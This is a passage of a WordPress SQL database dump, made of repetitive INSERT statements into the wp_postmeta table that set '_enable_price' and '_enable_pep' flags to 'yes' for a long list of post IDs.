INSERT INTO `wp_postmeta` VALUES (19821, 581, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19822, 582, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19823, 583, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19824, 577, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19825, 620, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19826, 621, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19827, 622, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19828, 623, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19829, 637, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19830, 638, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19831, 642, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19832, 643, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19833, 644, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19834, 645, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19835, 646, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19836, 647, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19837, 648, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19838, 649, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19839, 651, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19840, 652, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19841, 653, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19842, 654, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19843, 655, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19844, 656, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19845, 659, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19846, 671, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19847, 672, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19848, 674, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19849, 675, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19850, 696, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19851, 697, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19852, 707, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19853, 708, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19854, 713, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19855, 714, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19856, 715, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19857, 717, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19858, 732, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19859, 733, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19860, 734, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19861, 735, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19862, 736, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19863, 738, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19864, 769, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19865, 783, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19866, 784, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19867, 788, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19868, 789, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19869, 790, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19870, 814, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19871, 818, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19872, 819, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19874, 821, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19875, 822, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19876, 823, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19877, 824, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19878, 843, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19879, 844, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19880, 846, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19881, 847, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19882, 848, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19883, 850, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19884, 842, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19885, 852, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19886, 862, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19887, 861, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19888, 868, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19889, 878, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19890, 880, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19891, 877, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19892, 881, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19893, 882, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19894, 885, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19895, 887, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19896, 888, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19897, 891, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19898, 895, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19899, 900, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19900, 903, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19901, 910, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19902, 912, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19903, 918, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19904, 924, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19905, 937, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19906, 939, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19907, 943, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19908, 944, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19909, 941, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19910, 948, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19911, 954, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19912, 952, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19913, 956, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19914, 960, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19915, 955, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19916, 967, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19917, 968, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19918, 970, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19919, 977, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19920, 973, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19921, 984, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19922, 986, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19923, 989, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19924, 992, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19925, 993, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19926, 995, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19927, 996, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19928, 997, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19929, 998, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19930, 999, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19931, 1001, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19932, 994, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19933, 1002, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19934, 1009, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19935, 1010, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19936, 1011, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19937, 1012, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19938, 1014, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19939, 1015, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19940, 1016, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19941, 1019, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19942, 1031, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19943, 1033, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19944, 1035, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19945, 1042, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19946, 1059, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19947, 1061, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19948, 1063, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19949, 1065, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19950, 1067, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19951, 1069, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19952, 1072, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19953, 1077, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19954, 1088, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19955, 1097, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19956, 1100, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19957, 1102, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19958, 1104, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19959, 1106, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19960, 1111, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19961, 1149, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19962, 1152, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19963, 1164, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19964, 1166, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19965, 1168, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19966, 1178, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19967, 1181, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19968, 1183, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19969, 1185, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19970, 1187, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19971, 1189, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19972, 1191, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19973, 1193, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19974, 1198, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19975, 1209, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19976, 1212, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19977, 1216, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19978, 1221, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19979, 1224, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19980, 1227, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19981, 1230, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19982, 1263, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19983, 1268, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19984, 1270, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19985, 1276, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19986, 1278, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19987, 1287, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19988, 1292, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19989, 1338, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19990, 1344, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19991, 1384, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19992, 1428, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19993, 1431, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19994, 1435, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19995, 1637, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19996, 1638, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19997, 1643, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19998, 1644, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19999, 1645, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20000, 1646, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20001, 1647, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20002, 1648, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20003, 1649, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20004, 1662, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20005, 1664, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20006, 1666, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20007, 1668, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20008, 1670, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20009, 1673, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20010, 1677, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20011, 1679, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20012, 1681, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20013, 1683, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20014, 1690, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20015, 1693, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20016, 1695, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20017, 1697, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20018, 1705, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20019, 1706, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20020, 1707, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20021, 1708, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20022, 1710, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20023, 1711, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20024, 1712, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20025, 1713, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20026, 1719, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20027, 1722, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20028, 1724, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20029, 1726, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20030, 1729, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20031, 1801, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20032, 1819, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20033, 1836, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20034, 1840, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20035, 1834, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20036, 1851, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20037, 1852, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20038, 1866, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20039, 1868, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20040, 1865, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20052, 346, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20053, 979, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20054, 1831, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20055, 182, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20056, 190, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20057, 290, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20058, 293, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20059, 297, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20060, 302, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20061, 303, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20062, 305, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20063, 306, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20064, 308, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20065, 310, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20066, 347, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20067, 400, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20068, 402, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20069, 410, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20070, 421, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20071, 419, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20072, 423, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20073, 425, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20074, 427, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20075, 436, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20076, 437, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20077, 438, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20078, 439, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20079, 440, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20080, 441, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20081, 442, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20082, 467, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20083, 468, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20084, 469, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20085, 473, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20086, 474, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20087, 489, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20088, 490, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20089, 568, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20090, 452, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20091, 575, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20092, 579, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20093, 580, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20094, 581, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20095, 582, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20096, 583, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20097, 577, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20098, 620, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20099, 621, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20100, 622, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20101, 623, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20102, 637, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20103, 638, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20104, 642, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20105, 643, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20106, 644, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20107, 645, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20108, 646, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20109, 647, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20110, 648, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20111, 649, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20112, 651, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20113, 652, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20114, 653, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20115, 654, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20116, 655, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20117, 656, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20118, 659, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20119, 671, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20120, 672, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20121, 674, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20122, 675, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20123, 696, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20124, 697, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20125, 707, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20126, 708, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20127, 713, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20128, 714, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20129, 715, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20130, 717, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20131, 732, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20132, 733, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20133, 734, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20134, 735, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20135, 736, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20136, 738, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20137, 769, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20138, 783, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20139, 784, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20140, 788, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20141, 789, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20142, 790, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20143, 814, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20144, 818, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20145, 819, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20147, 821, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20148, 822, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20149, 823, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20150, 824, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20151, 843, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20152, 844, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20153, 846, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20154, 847, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20155, 848, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20156, 850, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20157, 842, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20158, 852, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20159, 862, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20160, 861, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20161, 868, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20162, 878, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20163, 880, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20164, 877, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20165, 881, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20166, 882, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20167, 885, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20168, 887, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20169, 888, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20170, 891, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20171, 895, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20172, 900, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20173, 903, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20174, 910, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20175, 912, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20176, 918, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20177, 924, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20178, 937, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20179, 939, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20180, 943, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20181, 944, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20182, 941, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20183, 948, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20184, 954, '_enable_pep', 'yes'); 
